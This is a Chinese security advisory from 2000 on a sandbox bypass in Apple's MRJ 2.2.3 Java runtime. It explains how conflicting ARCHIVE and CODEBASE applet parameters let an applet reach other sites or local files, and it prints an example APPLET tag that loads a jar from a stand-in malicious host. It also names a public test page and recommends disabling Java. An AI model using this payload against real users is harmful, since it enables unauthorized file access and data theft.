Apple Macintosh MRJ 未授权文件访问漏洞
发布日期:2000-12-20
更新日期:2000-12-20
受影响系统:
o Mac OS + MRJ 2.2.3 + Internet Explorer 4.5
o Mac OS + MRJ 2.2.3 + Internet Explorer 5
o Mac OS + MRJ 2.2.3 + Netscape 6
o Mac OS + MRJ 2.2.3 + iCab pre2.2
o Mac OS + MRJ 2.2.3 + Mozilla MRJ Plug-in 1.0b1 + Netscape 4.76
描述:
Mac OS的Java实时系统(MRJ) 的某些版本存在一个安全问题。这个Java执行系
统是较新的MacOS版本中自带的一个标准组件。另外,所有使用MRJ的第三方
Macintoshweb浏览器包括IE 4.5/5,Netscape 6, iCab等等均受此问题影响。
当ARCHIVE和CODEBASE参数冲突时,MRJ没有对Java运行环境进行正确的安全控
制。这可能允许一个恶意Java applet被下载并访问用户本地的文件系统或者
未授权Web站点。
ARCHIVE参数在HTML中被用来指定装入JAVA applet的信息。作为一个安全措施,
MRJ限制applet能访问的资源,它只能访问在ARCHIVE或CODEBASE参数中指定的
服务器。然而,如果这两个参数都被设置,这个安全措施就失效了,applet可
以访问任意地点的文件。
下面的例子中,"test.jar"将被从http://www.malicious.com/下载,并可以
访问http://www.victim.com.
<APPLET CODE="Test"
CODEBASE="http://www.victim.com/"
ARCHIVE="http://www.malicious.com/test.jar">
如果指定CODEBASE="http:///",applet将可以访问用户本地主机的文件。这可能
导致本地文件泄漏问题。
<*来源:Hiromitsu Takagi (
takagi@ETL.GO.JP)
http://java-house.etl.go.jp/ml/archive/j-h-b/039457.html
*>
测试方法:
警 告
以下程序(方法)可能带有攻击性,仅供安全研究与教学之用。使用者风险自负!
Hiromitsu Takagi提供了一个测试页面:
http://java-house.etl.go.jp/~takagi/java/security/mrj-codebase1/Test.html
建议:
临时解决方法:
NSFOCUS建议您在没有获取补丁之前,暂时关闭浏览器中的Java功能。
厂商补丁:
暂无
浏览次数:5491
严重程度:0(网友投票)